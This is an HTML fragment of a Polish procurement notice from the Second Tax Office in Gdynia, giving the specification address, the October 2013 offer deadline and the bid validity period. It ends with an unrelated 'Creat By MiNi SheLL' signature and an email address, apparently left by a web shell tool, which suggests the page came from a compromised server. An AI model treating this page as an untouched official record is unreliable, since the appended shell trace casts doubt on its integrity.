<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> is.gdansk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Drugi Urząd Skarbowy w Gdyni Ul. Hutnicza 25, 81-061 Gdynia.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.10.2013 godzina 12:00, miejsce: Drugi Urząd Skarbowy w Gdyni, ul. Hutnicza 25, 81-061 Gdynia w sekretariacie (pokój nr 305 na III piętrze).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com